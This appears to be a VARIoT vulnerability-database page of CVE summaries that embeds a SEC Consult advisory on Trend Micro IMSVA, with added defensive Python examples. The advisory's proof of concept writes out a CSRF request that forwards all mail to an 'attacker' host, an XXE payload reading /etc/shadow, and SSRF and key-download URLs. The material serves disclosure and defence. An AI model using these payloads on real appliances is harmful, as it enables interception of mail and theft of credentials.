VARIoT IoT vulnerabilities database
| VAR-202011-1021 | CVE-2020-3573 | Cisco Webex Network Recording Player and Cisco Webex Player for Windows buffer error vulnerability |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
Multiple vulnerabilities in Cisco Webex Network Recording Player for Windows and Cisco Webex Player for Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerabilities are due to insufficient validation of certain elements of a Webex recording that is stored in the Advanced Recording Format (ARF) or Webex Recording Format (WRF). An attacker could exploit these vulnerabilities by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user. The issue results from the lack of proper initialization of a pointer prior to accessing it.
| VAR-202011-1340 | CVE-2020-3604 | Cisco Webex Network Recording Player and Cisco Webex Player for Windows buffer error vulnerability |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
Multiple vulnerabilities in Cisco Webex Network Recording Player for Windows and Cisco Webex Player for Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerabilities are due to insufficient validation of certain elements of a Webex recording that is stored in the Advanced Recording Format (ARF) or Webex Recording Format (WRF). An attacker could exploit these vulnerabilities by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer.
| VAR-202011-0716 | CVE-2020-26083 | Cisco Identity Services Engine Cross-site Scripting Vulnerability |
CVSS V2: 3.5 CVSS V3: 4.8 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker with administrative credentials to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. To exploit this vulnerability, an attacker would need to have valid administrative credentials. The ISE platform monitors the network by collecting real-time information on the network, its users and devices, and by formulating and enforcing corresponding policies.
| VAR-202011-1235 | CVE-2020-3588 | Cisco Webex Meetings Desktop App for Windows path traversal vulnerability |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
A vulnerability in virtualization channel messaging in Cisco Webex Meetings Desktop App for Windows could allow a local attacker to execute arbitrary code on a targeted system. This vulnerability occurs when this app is deployed in a virtual desktop environment and using virtual environment optimization. This vulnerability is due to improper validation of messages processed by the Cisco Webex Meetings Desktop App. A local attacker with limited privileges could exploit this vulnerability by sending malicious messages to the affected software by using the virtualization channel interface. A successful exploit could allow the attacker to modify the underlying operating system configuration, which could allow the attacker to execute arbitrary code with the privileges of a targeted user. Note: This vulnerability can be exploited only when Cisco Webex Meetings Desktop App is in a virtual desktop environment on a hosted virtual desktop (HVD) and is configured to use the Cisco Webex Meetings virtual desktop plug-in for thin clients. Cisco Webex Meetings Desktop App for Windows contains a path traversal vulnerability. Information may be obtained or tampered with, and a denial of service (DoS) condition may result.
| VAR-202011-0084 | CVE-2020-13537 | Moxa MXView series privilege management vulnerability |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
An exploitable local privilege elevation vulnerability exists in the file system permissions of the Moxa MXView series 3.1.8 installation. Depending on the vector chosen, an attacker can either add code to a script or replace a binary. By default MXViewService, which starts as the NT AUTHORITY\SYSTEM user, executes a series of Node.js scripts to start additional application functionality; among them the mosquitto executable is also run. The Moxa MXView series contains a permission management vulnerability. Information may be obtained or tampered with, and a denial of service (DoS) condition may result. Moxa MXView is network management software developed by Moxa Corporation in Taiwan, China. This software can be used to configure and manage all devices in the network.
| VAR-202011-0083 | CVE-2020-13536 | Moxa MXView series privilege management vulnerability |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
An exploitable local privilege elevation vulnerability exists in the file system permissions of the Moxa MXView series 3.1.8 installation. Depending on the vector chosen, an attacker can either add code to a script or replace a binary. By default MXViewService, which starts as the NT AUTHORITY\SYSTEM user, executes a series of Node.js scripts to start additional application functionality. The Moxa MXView series contains a permission management vulnerability. Information may be obtained or tampered with, and a denial of service (DoS) condition may result. Moxa MXView is network management software developed by Moxa Corporation in Taiwan, China. This software can be used to configure and manage all devices in the network.
| VAR-202011-1029 | CVE-2020-3595 | Cisco SD-WAN vEdge access control error vulnerability |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to the root group on the underlying operating system. The vulnerability is due to incorrect permissions being set when the affected command is executed. An attacker could exploit this vulnerability by executing the affected command on an affected system. A successful exploit could allow the attacker to gain root privileges. Cisco SD-WAN Software contains a privilege management vulnerability. Information may be obtained or tampered with, and a denial of service (DoS) condition may result. Cisco SD-WAN vEdge is a router from Cisco of the United States. This device provides basic WAN, security and multi-cloud functions for Cisco SD-WAN solutions.
An access control error vulnerability exists in Cisco SD-WAN. The vulnerability stems from the network system or product improperly restricting access to resources from unauthorized roles. Attackers can use Cisco SD-WAN vEdge commands to bypass restrictions to elevate their privileges
| VAR-202011-1027 | CVE-2020-3593 | Cisco SD-WAN Software permission management vulnerability |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted request to a utility that is running on an affected system. A successful exploit could allow the attacker to gain root privileges. Cisco SD-WAN Software contains a privilege management vulnerability. Information may be obtained or tampered with, and a denial of service (DoS) condition may result. Cisco SD-WAN vManage is software provided by Cisco in the United States that delivers software-defined networking functions; it is a form of network virtualization. Cisco SD-WAN vEdge is a router from Cisco of the United States. This device provides basic WAN, security and multi-cloud functions for Cisco SD-WAN solutions.
Cisco SD-WAN Software has a privilege escalation vulnerability. The vulnerability stems from improper permission settings when the program executes the affected command
| VAR-202011-0717 | CVE-2020-26084 | Cisco Edge Fog Fabric exposure of resource to wrong sphere vulnerability |
CVSS V2: 5.5 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the REST API of Cisco Edge Fog Fabric could allow an authenticated, remote attacker to access files outside of their authorization sphere on an affected device. The vulnerability is due to incorrect authorization enforcement on an affected system. An attacker could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device. Cisco Edge Fog Fabric exposes a resource to the wrong sphere; information may be tampered with. The platform provides new IoT applications for advanced monitoring and diagnostics, enabling real-time quality inspection, proactive maintenance and smart operating use cases. This vulnerability is successfully exploited
| VAR-202011-0746 | CVE-2020-27019 | Trend Micro InterScan Messaging Security Virtual Appliance Information Disclosure Vulnerability |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an information disclosure vulnerability which could allow an attacker to access a specific database and key. Unauthorized attackers can use this vulnerability to obtain sensitive information about affected components.

W. Ettlinger (Office Vienna)
T. Serafin (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Trend Micro™ InterScan™ Messaging Security provides the most comprehensive
protection against both traditional and targeted attacks. Using the correlated
intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox
execution analysis, it blocks spam, phishing, and advanced persistent threats
(APTs)."
URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends performing a thorough security review of this
and similar Trend Micro products, conducted by security professionals, to
identify and resolve potential further security issues.
Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF)
CVE-2020-27016 (7.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
A web service accessible to authenticated administrators allows modifying the
appliance's policy configuration. This web service can also be accessed by
leveraging a CSRF scenario. An attacker could therefore modify policy rules
(e.g. bypass malware checks or forward all mails to another host) by tricking
an authenticated administrator into accessing an attacker-controlled web page.
2) XML External Entity Processing (XXE)
CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L)
The web service from vulnerability #1 accepts requests in the form of XML documents.
The XML parser used is not configured correctly, thus allowing an authenticated
administrator to read arbitrary local files through XXE.
Through an OOB XXE attack an attacker can exfiltrate local files through CSRF
(see #1).
3) Over-privileged Users/Services
Sudo is configured to allow several system users access to the root account.
An attacker gaining control over one of these accounts can access the system as
root. Moreover, several services are executed with the privileges of the user
root. Therefore, finding #2 allows an attacker to read files only accessible to
root (e.g. /etc/shadow).
4) Server Side Request Forgery (SSRF) & Local File Disclosure
CVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X)
A script accessible through the appliance's web server can be abused to request
any URL (e.g. http(s), file). An authenticated attacker can e.g. access any
http(s) resources or parts of some local files.
5) Information Disclosure
CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)
An SQLite database as well as a cryptographic key located in the webroot can be
accessed without authentication.
Note: It is unclear what the key is used for and whether the SQLite database
could contain sensitive information in specific configurations.
6) Insufficient Password Storage
CVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X)
The appliance stores passwords of administrative users as unsalted MD5 hashes
which can be cracked easily.
7) Outdated Software
CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)
Several software components installed on the appliance are outdated. Moreover,
the software updates provided by Trend Micro do not update the packages of the
CentOS base system.
SEC Consult did not verify whether the vulnerabilities identified through the
version information are present or whether the vulnerabilities have an impact
on the security of the system.
Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016)
The following request will create a rule that forwards all mails to an attacker:
--- snip ---
POST /ws_policies.imss HTTP/1.1
Host: [...]
Cookie: JSESSIONID=[...];
Content-Length: 374
<policies>
<policy
name="forward all traffic to attacker"
note="forward all traffic to attacker"
enable="yes"
version="1"
order="1"
type="other">
<route direction="incoming">
<from anyone="yes"></from>
<to anyone="yes"></to>
</route>
<actions>
<hand_off>attacker:25</hand_off>
</actions>
</policy>
</policies>
--- snip ---
The following HTML fragment shows how this request can be sent in a CSRF
scenario:
--- snip ---
<form action="https://[...]:8445/ws_policies.imss" method="POST"
enctype="text/plain">
<input type="hidden" name='<policies><policy name'
value='"forward all traffic to attacker"
note="forward all traffic to attacker"
enable="yes" version="1" order="1" type="other">
<route direction="incoming"><from anyone="yes"></from>
<to anyone="yes"></to></route>
<actions><hand_off>attacker:25</hand_off></actions>
</policy></policies>' />
<input type="submit" value="Submit request" />
</form>
--- snip ---
2) XML External Entity Processing (XXE) (CVE-2020-27017)
The following request demonstrates the retrieval of /etc/shadow:
--- snip ---
POST /ws_policies.imss HTTP/1.1
Host: [...]:8445
Cookie: JSESSIONID=[...];
Content-Length: 290
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
<policies>
<policy name="test" note="test" enable="yes" version="1" order="2" type="virus">
<route direction="incoming">
<from anyone="no">
<group>&xxe;</group>
</from>
</route>
</policy>
</policies>
--- snip ---
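Findings #1 and #2 share one endpoint (ws_policies.imss) and one root cause: the policy request is accepted from any origin and handed to an XML parser that resolves external entities. The following is an added example, written for this page and not code from SEC Consult or Trend Micro, of how a server-side handler can validate such a request before acting on it. The header names, the session token, the hand-off allow-list and the sample bodies are assumptions constructed for the example; the two payloads are modelled on the proof-of-concept requests above.

```python
import hmac
import re
import xml.etree.ElementTree as ET

# Any DTD is refused before the parser sees the document: the policy format never
# needs one, and a DTD is the only place an external entity can be declared.
DTD_MARKER = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Hosts a <hand_off> may forward mail to. An assumed allow-list for this example,
# not a setting of the real appliance.
ALLOWED_HAND_OFF_HOSTS = {"mailrelay.internal"}


def check_policy_request(headers, body, session_csrf_token):
    """Validate one policy-update request; returns (accepted, reason, policy_name)."""
    # CSRF, part 1: an HTML form can only submit text/plain, multipart/form-data or
    # application/x-www-form-urlencoded, so insisting on application/xml defeats the
    # enctype="text/plain" form shown in the proof of concept.
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/xml":
        return False, "content type must be application/xml, got %r" % ctype, None
    # CSRF, part 2: a per-session token in a custom header. A cross-site form cannot
    # set custom headers at all; the constant-time compare avoids a timing leak.
    if not hmac.compare_digest(headers.get("X-CSRF-Token", ""), session_csrf_token):
        return False, "missing or wrong CSRF token", None
    # XXE: reject declarations outright instead of trusting the parser's defaults.
    if DTD_MARKER.search(body):
        return False, "DTD or entity declaration not allowed", None
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return False, "malformed XML: %s" % exc, None
    if root.tag != "policies":
        return False, "unexpected root element <%s>" % root.tag, None
    policy = root.find("policy")
    if policy is None or not policy.get("name"):
        return False, "policy element or policy name missing", None
    # Semantic check: the rule the CSRF payload creates forwards all mail to an
    # arbitrary host, so every hand-off target is compared against the allow-list.
    for hand_off in policy.iter("hand_off"):
        host = (hand_off.text or "").strip().rsplit(":", 1)[0]
        if host not in ALLOWED_HAND_OFF_HOSTS:
            return False, "hand_off target %r not allowed" % host, policy.get("name")
    return True, "ok", policy.get("name")


# Constructed sample requests (headers and bodies are assumptions modelled on the
# advisory's proof-of-concept requests, not captured appliance traffic).
SESSION_TOKEN = "c0ffee-example-session-token"
XML_HEADERS = {"Content-Type": "application/xml", "X-CSRF-Token": SESSION_TOKEN}

LEGITIMATE_BODY = b"""<policies>
<policy name="archive incoming mail" note="" enable="yes" version="1" order="1" type="other">
<route direction="incoming"><from anyone="yes"></from><to anyone="yes"></to></route>
<actions><hand_off>mailrelay.internal:25</hand_off></actions>
</policy>
</policies>"""

# What a browser sends for the enctype="text/plain" form: "name=value" plus CRLF, so
# the hidden input's name and value are glued together into one XML document.
CSRF_FORM_BODY = (b'<policies><policy name="forward all traffic to attacker"\n'
                  b'note="forward all traffic to attacker"\n'
                  b'enable="yes" version="1" order="1" type="other">\n'
                  b'<route direction="incoming"><from anyone="yes"></from>\n'
                  b'<to anyone="yes"></to></route>\n'
                  b'<actions><hand_off>attacker:25</hand_off></actions>\n'
                  b'</policy></policies>\r\n')

XXE_BODY = (b'<!DOCTYPE foo [<!ELEMENT foo ANY >\n'
            b'<!ENTITY xxe SYSTEM "file:///etc/shadow" >]>\n'
            b'<policies><policy name="test" note="test" enable="yes" version="1" order="2" type="virus">'
            b'<route direction="incoming"><from anyone="no"><group>&xxe;</group></from></route>'
            b'</policy></policies>')

SAMPLES = {
    "legitimate": (XML_HEADERS, LEGITIMATE_BODY),
    "csrf_form": ({"Content-Type": "text/plain"}, CSRF_FORM_BODY),
    "xxe": (XML_HEADERS, XXE_BODY),
    # an authenticated admin session submitting the same payload still fails the allow-list
    "rogue_hand_off": (XML_HEADERS, CSRF_FORM_BODY),
}


def evaluate_samples():
    """Run every sample through the check; returns {name: (accepted, reason, policy)}."""
    return {name: check_policy_request(h, b, SESSION_TOKEN) for name, (h, b) in SAMPLES.items()}


if __name__ == "__main__":
    for name, (ok, reason, policy) in evaluate_samples().items():
        print("%-15s %-7s %s" % (name, "ACCEPT" if ok else "REJECT", reason))
```

The DTD check deliberately runs on the raw bytes rather than relying on parser options, so it holds regardless of which XML library sits behind the endpoint; the content-type and header-token checks are what the text/plain form trick cannot satisfy, and the allow-list catches the same rogue rule even when it arrives in a fully authenticated session.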
3) Over-privileged Users/Services
The local users "admin", "enable" and all users in the group "cliusers" can execute
commands as root (no password entry required). Note that at least for the users
"admin" and "enable" a restricted shell is configured, thus shell access is not
easily possible.
Several network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root.
Trend Micro supplied the following additional information:
(a) If an IMSVA user has created clish users, they can only run limited commands
(IMSVA pre-defined commands), and all of these are one-time commands
(not a running service in the backend).
(b) Most of these clish commands only read logs and do not accept any arguments,
so they cannot terminate or inject commands.
(c) A few commands (such as ping) only accept a few arguments (such as an IP), but these
are well checked. Users cannot input any arguments with another meaning, so they
cannot terminate or inject commands.
Trend Micro decided not to include vulnerability #3 in the hardening/patch of the
product as admin and enabled accounts are as important as root and changing the
architecture would cause some functions not to work as expected.
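Finding #3 is a sudo configuration question rather than a code defect, and it is the kind of grant that a periodic configuration audit should surface. The following is an added example, not part of the advisory, that parses sudoers-style lines and rates each grant by whether it reaches root, covers every command, and needs no password. The sudoers excerpt is constructed to mirror the advisory's description (the "admin" and "enable" users and the "cliusers" group); it is not the appliance's real file, and the "backup" entry is added only to show a narrower grant.

```python
import re

# Constructed /etc/sudoers excerpt shaped after the advisory's finding #3
# (an assumption for this example, not the appliance's actual configuration).
SAMPLE_SUDOERS = """\
Defaults env_reset
root      ALL=(ALL) ALL
admin     ALL=(ALL) NOPASSWD: ALL
enable    ALL=(ALL) NOPASSWD: ALL
%cliusers ALL=(ALL) NOPASSWD: ALL
backup    ALL=(root) NOPASSWD: /usr/bin/rsync   # narrower grant, for contrast
"""

# user-or-%group  host = (runas) TAG: ... commands
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$")

SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def audit_sudoers(text):
    """Return a list of {principal, severity, detail} for grants that reach root."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m or m["who"] == "root":             # root's own grant is not a finding
            continue
        # No (runas) spec means root; "ALL:ALL" style specs keep only the user part.
        runas_users = (m["runas"] or "root").split(":")[0]
        reaches_root = runas_users in ("ALL", "root") or "root" in runas_users.split(",")
        nopasswd = "NOPASSWD" in m["tags"]
        every_command = m["cmds"].strip() == "ALL"
        if reaches_root and every_command:
            severity = "critical" if nopasswd else "high"
            detail = "unrestricted root via sudo" + (" without a password" if nopasswd else "")
        elif reaches_root and nopasswd:
            severity = "medium"
            detail = "passwordless root for: " + m["cmds"].strip()
        else:
            continue
        findings.append({"principal": m["who"], "severity": severity, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("%-9s %-10s %s" % (f["severity"], f["principal"], f["detail"]))
```

A restricted login shell, as the advisory notes for "admin" and "enable", limits what is typed interactively but is not a sudo boundary; the audit therefore looks only at what sudo itself would permit if the account were reached by any other route.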
4) Server Side Request Forgery (SSRF) & Local File Disclosure (CVE-2020-27018)
The following URL demonstrates the retrieval of an HTTP URL through the appliance:
https://<host>:8445/widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://test
When accessing file:// URLs, the application sends only the content that follows
a sequence \r\n\r\n. Therefore only parts of certain files can be retrieved.
5) Information Disclosure (CVE-2020-27019)
The following URL demonstrates the unauthenticated retrieval of a cryptographic
key:
https://<host>:8445/widget/repository/inc/class/common/crypt/crypt.key
Moreover, an SQLite database can be retrieved.
https://<host>:8445/widget/repository/db/sqlite/tmwf.db
The contents of these files have not been further investigated.
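Findings #4 and #5 both leave traces in the web server's access log: the two webroot files from #5 should never be served with a 200, and the proxy script from #4 should only ever fetch http(s) resources from the hosts the widget framework needs. The following is an added example, not code from the advisory or the vendor, of a detector over such log lines. It assumes Apache combined log format and an allow-list of expected proxy targets; the log lines themselves are constructed for the example and do not come from a real appliance.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache combined log format (an assumption about the appliance; adapt LOG_RE if
# the real format differs).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')

# Webroot files from finding #5 that must never be served.
SECRET_PATHS = {
    "/widget/repository/inc/class/common/crypt/crypt.key",
    "/widget/repository/db/sqlite/tmwf.db",
}
# The proxy script from finding #4 and the hosts it is expected to fetch from
# (the allow-list is an assumption for this example, not an IMSVA setting).
PROXY_PATH = "/widget/proxy_controller.php"
EXPECTED_PROXY_HOSTS = {"widget-feed.internal"}


def scan_access_log(text):
    """Return (client_ip, rule, detail) triples for suspicious requests in log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m["target"])
        if target.path in SECRET_PATHS:
            # After the patch these should 403/404; a 200 means the file left the box.
            if int(m["status"]) == 200:
                findings.append((m["ip"], "webroot-secret-served", target.path))
            continue
        if target.path == PROXY_PATH:
            url = parse_qs(target.query).get("url", [""])[0]
            u = urlsplit(url)
            if u.scheme not in ("http", "https"):
                findings.append((m["ip"], "proxy-non-http-scheme", url))
            elif u.hostname not in EXPECTED_PROXY_HOSTS:
                findings.append((m["ip"], "proxy-unexpected-host", url))
    return findings


def offenders(findings):
    """Count findings per client address, most active first."""
    return Counter(ip for ip, _, _ in findings).most_common()


# Constructed sample log (not real appliance traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Oct/2020:10:01:12 +0200] "GET /widget/repository/inc/class/common/crypt/crypt.key HTTP/1.1" 200 48 "-" "curl/7.64.1"
10.0.0.5 - - [23/Oct/2020:10:01:13 +0200] "GET /widget/repository/db/sqlite/tmwf.db HTTP/1.1" 200 20480 "-" "curl/7.64.1"
10.0.0.7 - - [23/Oct/2020:10:02:40 +0200] "GET /widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=file:///etc/shadow HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.0.0.7 - - [23/Oct/2020:10:02:55 +0200] "GET /widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://10.0.0.1:8080/ HTTP/1.1" 200 1044 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Oct/2020:10:03:01 +0200] "GET /widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://widget-feed.internal/status HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Oct/2020:10:03:02 +0200] "GET /widget/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.11 - - [23/Oct/2020:11:15:00 +0200] "GET /widget/repository/inc/class/common/crypt/crypt.key HTTP/1.1" 404 196 "-" "curl/7.64.1"
"""

if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for ip, rule, detail in hits:
        print("%-10s %-24s %s" % (ip, rule, detail))
    print("per client:", offenders(hits))
```

The 404 line for crypt.key is what the log should look like once the patch is applied; keeping the secret-path rule conditional on a 200 keeps post-patch probing from drowning the alert that matters, while the proxy rules still fire on scheme and host regardless of status.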
6) Insufficient Password Storage (CVE-2020-27693)
The passwords for local administrators are stored in a Postgres database
(table tb_administrator, column md5_digest). The hashes are stored as unsalted
MD5 digests which can be cracked easily.
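The defect in finding #6 is twofold: MD5 is fast, and without a salt every user with the same password has the same digest, so one precomputed table cracks the whole tb_administrator table. The following is an added example, not code from the advisory or Trend Micro, showing the legacy scheme beside a salted, iterated replacement and the usual migration step that rehashes a legacy record on the user's next successful login. The record format, the iteration count and the column handling are assumptions for this example.

```python
import hashlib
import hmac
import secrets

# Assumed work factor for PBKDF2-HMAC-SHA256; tune to the hardware the login path runs on.
PBKDF2_ITERATIONS = 600_000


def legacy_md5_digest(password):
    """The scheme the advisory describes: unsalted MD5 of the raw password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Salted, iterated record: pbkdf2_sha256$<iterations>$<salt hex>$<dk hex>."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute the derived key from the stored salt and compare in constant time."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def upgrade_legacy_record(md5_digest, password):
    """Migration at login: if the legacy MD5 matches, return the replacement record
    to write back (and the md5_digest column can then be cleared); otherwise None."""
    if not hmac.compare_digest(legacy_md5_digest(password), md5_digest):
        return None
    return hash_password(password)


def same_password_same_record(scheme, password):
    """True if the scheme maps identical passwords to identical stored values, which is
    exactly what makes a precomputed table work against every account at once."""
    return scheme(password) == scheme(password)


if __name__ == "__main__":
    print("unsalted MD5 repeats:", same_password_same_record(legacy_md5_digest, "correct horse"))
    print("salted PBKDF2 repeats:", same_password_same_record(hash_password, "correct horse"))
    record = upgrade_legacy_record(legacy_md5_digest("correct horse"), "correct horse")
    print("migrated record verifies:", verify_password("correct horse", record))
```

The migration keeps the legacy column only until each administrator logs in once; accounts that never log in again should be reset rather than left on MD5.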
7) Outdated Software (CVE-2020-27694)
The following software versions are present in an appliance with patch level
1993:
* PHP 5.6.38 (PHP 5.6 is EOL)
* Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html)
* Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html)
The appliance is built on top of a CentOS base system. The CentOS packages
appear not to be updated with appliance updates. In a test system, the command
"yum check-update" yielded 203 updates to installed packages.
Vulnerable / tested versions:
-----------------------------
Version 9.1.0.1960 Critical Patch 1993 has been tested and was found to be
vulnerable. Previous versions are affected as well.
Vendor contact timeline:
------------------------
2020-04-28: Contacting vendor through security@trendmicro.com
Submitting advisory information encrypted (PGP).
2020-04-28: Vendor reply, they will take a look at the issue.
2020-05-06: Vendor states that vulnerability resolution is in progress;
Vendor has questions regarding two vulnerabilities
2020-05-07: Clarifying vulnerabilities
2020-05-25: Asking for status update
2020-05-25: Vendor: Vulnerability resolution is still in progress,
details follow
2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June
2020-06-29: Asking for status update
2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6
2020-07-07: Sending results of short recheck
#1 CSRF - fixed
#2 XXE - fixed
#4 SSRF/LFD - fixed
#5 InfoDisc - fixed
#6 Password Storage - not properly fixed yet
2020-07-08: Vendor confirms receipt; has question regarding #3
2020-07-10: Clarifying questions
2020-08-04: Asking for a status update
2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress.
2020-08-22: Vendor provides information that all issues have been fixed except
issue #3 as hardening it further would potentially break some features.
2020-08-24: Further advisory release coordination (date, CVE numbers, patch version)
2020-09-18: Asking for a status update; Answer: "The hotfix is ready, however, the
official critical patch to be used for public disclosure is still being
finalized"; disclosure date will be communicated later
2020-10-23: Patch is already public since 2020-10-09, but no security bulletin yet
which will be coordinated
2020-11-04: Coordinated release of security advisory
Solution:
---------
The vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025)
which should be installed immediately. The release notes can be found here:
https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt
Patch download:
https://downloadcenter.trendmicro.com/index.php?regs=nabu&prodid=91
https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz
Trend Micro Security Bulletin:
https://success.trendmicro.com/solution/000279833
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF W. Ettlinger / @2020
| VAR-202011-0803 | CVE-2020-27694 | Trend Micro InterScan Messaging Security Virtual Appliance Vulnerability in |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 has updated a specific critical library that may be vulnerable to attack. No detailed vulnerability details are currently provided. The SEC Consult advisory reproduced under VAR-202011-0746 (CVE-2020-27019) above covers this finding as item 7, Outdated Software.
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
